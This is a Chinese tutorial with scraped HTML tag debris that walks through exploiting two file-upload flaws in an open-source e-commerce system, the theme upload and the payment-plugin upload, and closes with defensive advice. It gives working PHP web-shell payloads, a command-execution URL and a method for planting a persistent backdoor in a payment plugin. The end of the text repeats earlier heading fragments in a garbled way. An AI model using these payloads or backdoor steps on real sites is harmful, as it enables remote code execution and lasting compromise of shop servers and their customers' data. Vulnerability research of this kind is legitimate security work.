开源商城系统漏洞分析与利用教学文档<\/h1>

1. 任意代码执行漏洞1：主题上传利用<\/h2>

漏洞位置<\/h3>
`ThemeAdminUploadHandle<\/code> 类中的主题上传功能<\/p>`

漏洞原理<\/h3>

系统允许上传主题压缩包，解压后会将文件放置在特定目录<\/li>
虽然有以下限制：

文件必须位于 _html_<\/code> 或 _static_<\/code> 文件夹下<\/li>
禁止上传 .php<\/code> 后缀文件<\/li>
<\/ul>
<\/li>
但可以通过上传包含PHP代码的HTML文件实现代码执行<\/li>
<\/ol>
利用步骤<\/h3>


准备一个压缩包，结构如下：<\/p>
_html_\/default\/agreement\/1.html
<\/code><\/pre>
其中 1.html<\/code> 包含PHP代码，如：<\/p>
<?<\/span>php<\/span> system<\/span>($_GET['1'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>

上传该主题压缩包<\/p>
<\/li>

上传成功后访问：<\/p>
http:\/\/127.0.0.1\/?s=agreement\/index\/&1=whoami
<\/code><\/pre>
即可执行系统命令<\/p>
<\/li>
<\/ol>
关键点<\/h3>

系统会动态加载模板目录下的文件<\/li>
通过HTML文件绕过PHP后缀限制<\/li>
利用路径 \/app\/index\/view\/default\/agreement<\/code> 实现代码执行<\/li>
<\/ul>
2. 任意代码执行漏洞2：支付插件上传利用<\/h2>
漏洞位置<\/h3>
app\/admin\/controller\/Payment.php<\/code> 中的 Upload()<\/code> 和 UploadHandle<\/code> 方法<\/p>
漏洞原理<\/h3>

系统允许上传支付插件<\/li>
上传流程：

先使用 stream_get_contents<\/code> 读取文件内容<\/li>
然后进行校验<\/li>
<\/ul>
<\/li>
校验函数 GetPaymentConfig()<\/code> 会通过 class_exists<\/code> 动态加载上传的PHP文件<\/li>
虽然有 strpos($file_content, 'eval(') === false<\/code> 过滤，但很容易绕过<\/li>
<\/ol>
利用步骤<\/h3>
方法一：直接上传PHP文件<\/p>

创建一个 1.php<\/code> 文件，内容为：
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 任意PHP代码
<\/span><\/span><\/span><\/span>system<\/span>($_GET['cmd'<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
上传该文件<\/li>
系统会自动加载并执行其中的代码<\/li>
<\/ol>
方法二：持久化上传<\/p>

创建一个合法的支付插件文件，如 AlipayScanQrcode.php<\/code><\/li>
在其中插入恶意代码<\/li>
上传后该文件会被系统持续加载<\/li>
<\/ol>
关键点<\/h3>

文件内容先被读取后校验，存在时间差<\/li>
class_exists<\/code> 会动态加载PHP文件<\/li>
eval<\/code> 过滤可轻易绕过<\/li>
可实现持久化后门<\/li>
<\/ul>
防御建议<\/h2>


对于主题上传：<\/p>

严格限制上传文件类型<\/li>
对HTML文件内容进行检查<\/li>
禁止动态执行模板文件中的代码<\/li>
<\/ul>
<\/li>

对于支付插件上传：<\/p>

实现白名单机制，只允许特定支付插件<\/li>
在加载前进行完整的安全检查<\/li>
禁止用户上传可执行代码<\/li>
<\/ul>
<\/li>

通用防御：<\/p>

实现文件上传内容安全检查<\/li>
限制上传文件的执行权限<\/li>
对用户上传的文件进行隔离存储<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
这两个漏洞都源于对用户上传文件处理不当，结合系统动态加载机制导致的任意代码执行。攻击者可以通过精心构造的文件上传实现系统命令执行，危害极大。开发者在实现文件上传功能时应特别注意安全校验机制的设计。<\/p>

开源商城系统漏洞分析与利用教学文档<\/h1>

1. 任意代码执行漏洞1：主题上传利用<\/h2>

漏洞位置<\/h3> ThemeAdminUploadHandle<\/code> 类中的主题上传功能<\/p>

2. 任意代码执行漏洞2：支付插件上传利用<\/h2>

漏洞位置<\/h3> app\/admin\/controller\/Payment.php<\/code> 中的 Upload()<\/code> 和 UploadHandle<\/code> 方法<\/p>

漏洞位置<\/h3>
`ThemeAdminUploadHandle<\/code> 类中的主题上传功能<\/p>`

漏洞位置<\/h3>
`app\/admin\/controller\/Payment.php<\/code> 中的 Upload()<\/code> 和 UploadHandle<\/code> 方法<\/p>`